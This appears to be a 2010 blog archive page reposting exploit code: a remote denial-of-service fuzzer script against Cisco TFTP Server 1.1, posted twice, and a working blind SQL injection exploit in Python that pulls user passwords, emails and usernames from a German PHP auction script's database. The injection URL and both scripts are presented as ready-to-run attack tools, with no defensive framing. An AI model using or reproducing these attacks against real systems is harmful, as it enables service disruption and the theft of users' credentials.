Pages

Saturday, March 27, 2010

[Cisco TFTP Server 1.1]

# Exploit Title: [Cisco TFTP Server 1.1]
# Date: [2010-03-25]
# Author: [_SuBz3r0_]
# Software Link: [http://www.oldversion.com/Cisco_TFTP_Server.html]
# Version: [1.1]
# Tested on: [XP SP3,Win2k3]
# CVE : [if exists]
# Code :
#Cisco TFTP Server v1.1 DoS
print ""
print "##############################################"
print "# _SuBz3r0_ #"
print "##############################################"
print ""
print "Cisco TFTP v1.1 Remote DoS"
print "Just For Fun"
print "tftp_fuzz.py [ip of server]"
print ""
print "Greetz:piloo le canari & MaX"
print "Credits to Ilja van Sprundel"
print "Tested on: French Windows Xp Sp3 fully Patched"
print ""
#!/usr/bin/python
# tftpd fuzzer by Ilja van Sprundel
# implements rfc 1350, 2090, 2347, 2348, 2349
#
# todo: - 1 option per packet
# - lots (>100) (small) options per packet
# - add better option support to OACK
# - client fuzzing ?
import os, socket, sys, struct, random
port = 69
type = ["netascii", "octet", "binary", "mail"]
asize = ["blkzise", "tsize"]
class fuzz:
def __init__(self):
""" """
def randstring(self, len):
thestring = ""
what = random.randint(0,5)
if what < 5:
for i in range(len):
char = chr(random.randint(1,255))
thestring += char
else:
thestring = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
return thestring
def randbin(self, len):
thestring = ""
for i in range(len):
char = chr(random.randint(0,255))
thestring += char
return thestring
def fuzz_rw(self):
""" """
data = ""
if not random.randint(0,50):
return ""
if not random.randint(0,10):
if random.randint(0,1):
data = "../"
else:
howmany = random.randint(1,100)
data = "../" * howmany
data += self.randstring(random.randint(0,3000))
# no 0byte
if not random.randint(0,10):
return data
data += "\0"
# no mode
if not random.randint(0,100):
return data
if random.randint(0,5):
data += random.choice(type)
else:
data += self.randstring(random.randint(0,3000))
if not random.randint(0,10):
return data
data += "\0"
if not random.randint(0,10):
return data
options = random.randint(0,100)
if not random.randint(0,10):
breakloop = 1
breakit = random.randint(0, options)
else:
breakloop = 0
longarg = random.randint(0, options)
if not random.randint(0,10):
lowlimit = 16
options = options / 4
else:
lowlimit = 0
for i in range(options):
which = random.randint(lowlimit, 19)
if which < 16:
if longarg == i:
data += self.randstring(random.randint(0,3000))
else:
data += self.randstring(random.randint(0,100))
data += "\0"
data += self.randstring(random.randint(0,100))
if which == 16:
data += "multicast\0"
if not random.randint(0,5):
if random.randint(0,1):
data += self.randstring(random.randint(0,50))
else:
data += str(random.randint(0, 0xffffffff))
if which == 17 or which == 18:
data += random.choice(asize) + "\0"
if random.randint(0,10):
if random.randint(0,1):
uplimit = 65535
else:
uplimit = 0xffffffff
string = str(random.randint(0, uplimit))
if random.randint(0,1):
data += "-"
data += string
else:
data += self.randstring(random.randint(0,50))
if which == 19:
data += "timeout\0"
if random.randint(0,10):
which = random.randint(0,5)
if which < 4:
uplimit = 255
if which == 4:
uplimit = 65535
else:
uplimit = 0xffffffff
string = str(random.randint(0, uplimit))
if random.randint(0,1):
data += "-"
data += string
else:
data += self.randstring(random.randint(0,50))
if breakloop:
if i == breakit:
return data
data += "\0"
return data
def make_data(self):
""" """
which = random.randint(0,10)
if which < 6:
# read is more likely to be accepted then write
# hence we bias it towards reading !
if random.randint(0,2):
d = "\x00\x01"
else:
d = "\x00\x02"
d += self.fuzz_rw()
# do some tftpd's do something with this ???
elif which == 6:
d = "\x00\x03"
d += self.randbin(2)
d += self.randbin(random.randint(0,3000))
elif which == 7:
d = "\x00\x04"
d += self.randbin(2)
if not random.randint(0,10):
d += self.randbin(random.randint(0,3000))
elif which == 8:
d = "\x00\x05"
d += self.randbin(2)
d += self.randstring(random.randint(0,1000))
if random.randint(0,10):
d += "\0"
elif which == 9:
# lets do this later ....
d = "\x00\x06"
d += self.randbin(1000)
else:
if random.randint(0,2):
times = 512
else:
times = random.randint(512, 10000)
d = self.randbin(random.randint(0,times))
return d
def run(self):
""" """
packets = 0
try:
while 1:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
da = self.make_data()
s.sendto(da, (host, port))
s.close()
os.write(1,".")
packets += 1
except KeyboardInterrupt:
print "\nPackets: " + str(packets)
if __name__ == '__main__':
if len(sys.argv) <= 1:
sys.exit(0)
host = sys.argv[1]
if len(sys.argv) >= 3:
port = sys.argv[2]
f = fuzz()
f.run()



Diposkan oleh di No comments:
Label:

[Cisco TFTP Server 1.1]

# Exploit Title: [Cisco TFTP Server 1.1]
# Date: [2010-03-25]
# Author: [_SuBz3r0_]
# Software Link: [http://www.oldversion.com/Cisco_TFTP_Server.html]
# Version: [1.1]
# Tested on: [XP SP3,Win2k3]
# CVE : [if exists]
# Code :
#Cisco TFTP Server v1.1 DoS
print ""
print "##############################################"
print "# _SuBz3r0_ #"
print "##############################################"
print ""
print "Cisco TFTP v1.1 Remote DoS"
print "Just For Fun"
print "tftp_fuzz.py [ip of server]"
print ""
print "Greetz:piloo le canari & MaX"
print "Credits to Ilja van Sprundel"
print "Tested on: French Windows Xp Sp3 fully Patched"
print ""
#!/usr/bin/python
# tftpd fuzzer by Ilja van Sprundel
# implements rfc 1350, 2090, 2347, 2348, 2349
#
# todo: - 1 option per packet
# - lots (>100) (small) options per packet
# - add better option support to OACK
# - client fuzzing ?
import os, socket, sys, struct, random
port = 69
type = ["netascii", "octet", "binary", "mail"]
asize = ["blkzise", "tsize"]
class fuzz:
def __init__(self):
""" """
def randstring(self, len):
thestring = ""
what = random.randint(0,5)
if what < 5:
for i in range(len):
char = chr(random.randint(1,255))
thestring += char
else:
thestring = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
return thestring
def randbin(self, len):
thestring = ""
for i in range(len):
char = chr(random.randint(0,255))
thestring += char
return thestring
def fuzz_rw(self):
""" """
data = ""
if not random.randint(0,50):
return ""
if not random.randint(0,10):
if random.randint(0,1):
data = "../"
else:
howmany = random.randint(1,100)
data = "../" * howmany
data += self.randstring(random.randint(0,3000))
# no 0byte
if not random.randint(0,10):
return data
data += "\0"
# no mode
if not random.randint(0,100):
return data
if random.randint(0,5):
data += random.choice(type)
else:
data += self.randstring(random.randint(0,3000))
if not random.randint(0,10):
return data
data += "\0"
if not random.randint(0,10):
return data
options = random.randint(0,100)
if not random.randint(0,10):
breakloop = 1
breakit = random.randint(0, options)
else:
breakloop = 0
longarg = random.randint(0, options)
if not random.randint(0,10):
lowlimit = 16
options = options / 4
else:
lowlimit = 0
for i in range(options):
which = random.randint(lowlimit, 19)
if which < 16:
if longarg == i:
data += self.randstring(random.randint(0,3000))
else:
data += self.randstring(random.randint(0,100))
data += "\0"
data += self.randstring(random.randint(0,100))
if which == 16:
data += "multicast\0"
if not random.randint(0,5):
if random.randint(0,1):
data += self.randstring(random.randint(0,50))
else:
data += str(random.randint(0, 0xffffffff))
if which == 17 or which == 18:
data += random.choice(asize) + "\0"
if random.randint(0,10):
if random.randint(0,1):
uplimit = 65535
else:
uplimit = 0xffffffff
string = str(random.randint(0, uplimit))
if random.randint(0,1):
data += "-"
data += string
else:
data += self.randstring(random.randint(0,50))
if which == 19:
data += "timeout\0"
if random.randint(0,10):
which = random.randint(0,5)
if which < 4:
uplimit = 255
if which == 4:
uplimit = 65535
else:
uplimit = 0xffffffff
string = str(random.randint(0, uplimit))
if random.randint(0,1):
data += "-"
data += string
else:
data += self.randstring(random.randint(0,50))
if breakloop:
if i == breakit:
return data
data += "\0"
return data
def make_data(self):
""" """
which = random.randint(0,10)
if which < 6:
# read is more likely to be accepted then write
# hence we bias it towards reading !
if random.randint(0,2):
d = "\x00\x01"
else:
d = "\x00\x02"
d += self.fuzz_rw()
# do some tftpd's do something with this ???
elif which == 6:
d = "\x00\x03"
d += self.randbin(2)
d += self.randbin(random.randint(0,3000))
elif which == 7:
d = "\x00\x04"
d += self.randbin(2)
if not random.randint(0,10):
d += self.randbin(random.randint(0,3000))
elif which == 8:
d = "\x00\x05"
d += self.randbin(2)
d += self.randstring(random.randint(0,1000))
if random.randint(0,10):
d += "\0"
elif which == 9:
# lets do this later ....
d = "\x00\x06"
d += self.randbin(1000)
else:
if random.randint(0,2):
times = 512
else:
times = random.randint(512, 10000)
d = self.randbin(random.randint(0,times))
return d
def run(self):
""" """
packets = 0
try:
while 1:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
da = self.make_data()
s.sendto(da, (host, port))
s.close()
os.write(1,".")
packets += 1
except KeyboardInterrupt:
print "\nPackets: " + str(packets)
if __name__ == '__main__':
if len(sys.argv) <= 1:
sys.exit(0)
host = sys.argv[1]
if len(sys.argv) >= 3:
port = sys.argv[2]
f = fuzz()
f.run()



Diposkan oleh di No comments:
Label:

Date & Sex Vor und Rückwärts Auktions System <= v2 Blind SQL Injection Exploit

+Name : Date & Sex Vor und Rückwärts Auktions System <= v2 Blind SQL Injection Exploit +Autor : Easy Laster +Date : 27.03.2010 +Script : Date & Sex Vor und Rückwärts Auktions System <= v2 +Download : ------------------ +Demo : http://phpspezial.de/date-auktion-v2/ +Price : 599.99€ +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/flirt/auktion_text.php?id_auk= #password +Exploitable : http://www.site.com/flirt/auktion_text.php?id_auk=1+and+1=1+and+ ascii(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1


-----------------------------------------------------------------------------------------

#Exploit

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, getopt

def out(str):
sys.stdout.write(str)
sys.stdout.flush()

def read_url(url):
while True:
try:
src = urllib2.urlopen(url).read()
break
except:
pass
return src

class Exploit:
charset = "0123456789abcdefABCDEF"
url = ""
charn = 1
id = 1
table_prefix = ""
table_field = ""
passwd = ""
columns = []
find_passwd = True

def __init__(self):
if len(sys.argv) <> *"
print "* *"
print "* Example: *"
print "* *"
print "* Get the password of the user with id 2: *"
print "* python exploit.py --id 2 http://site.de/path/ *"
print "* *"
print "* Get email, username and password of id 1: *"
print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/ *"
print "* *"
print "* Switches: *"
print "* --nopw Search no password *"
print "* *"
print "* Options: *"
print "* --id User id *"
print "* --prefix Table prefix of ECP *"
print "* --charn <1 default =" 1"> Start at position x *"
print "* --columns Get value of any column you want *"
print "*****************************************************************************"
exit()
opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"])
for opt in opts:
if opt[0] == "--id":
self.id = int(opt[1])
elif opt[0] == "--prefix":
self.table_prefix = opt[1]
elif opt[0] == "--charn":
self.charn = int(opt[1])
elif opt[0] == "--columns":
for col in opt[1].split(","):
max, charx, name = col.split(":")
self.columns.append([int(max), int(charx), name, ""])
elif opt[0] == "--nopw":
self.find_passwd = False
for switch in switches:
if switch[:4] == "http":
if switch[-1:] == "/":
self.url = switch
else:
self.url = switch + "/"
def generate_url(self, ascii):
return self.url + "auktion_text.php?id_auk=1+and+1=1+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "fh_user+WHERE+iduser=" + str(self.id) + "%20LIMIT%200,1)," + str(self.charn) + ",1))%3E" + str(ord(ascii))
def start(self):
print "Exploiting..."
if self.find_passwd:
charx = self.charn
self.password()
if len(self.columns) > 0:
self.read_columns()
print "All finished!\n"
print "------ Results ------"
if len(self.columns) > 0:
for v in self.columns:
print "Column \"" + v[2] + "\": " + v[3]
if self.find_passwd:
if len(self.passwd) == 32 - charx + 1:
print "Password: " + self.passwd
else:
print "Password not found!"
print "--------------------"
def read_columns(self):
end = False
charrange = [0]
charrange.extend(range(32, 256))
for i in range(len(self.columns)):
out("Getting value of \"" + self.columns[i][2] + "\": ")
self.table_field = self.columns[i][2]
self.charn = self.columns[i][1]
for pwc in range(self.charn, self.columns[i][0] + 1):
if end == True:
break
self.charn = pwc
end = False
for c in charrange:
src = read_url(self.generate_url(chr(c)))
if "test" not in src:
if c == 0:
end = True
else:
self.columns[i][3] += chr(c)
out(chr(c))
break
out("\n")
def password(self):
out("Getting password: ")
self.table_field = "password"
for pwc in range(self.charn, 33):
self.charn = pwc
for c in self.charset:
src = read_url(self.generate_url(c))
if "test" not in src:
self.passwd += c
out(c)
break
out("\n")

exploit = Exploit()
exploit.start()

Diposkan oleh di No comments:
Label:
Subscribe to: Comments (Atom)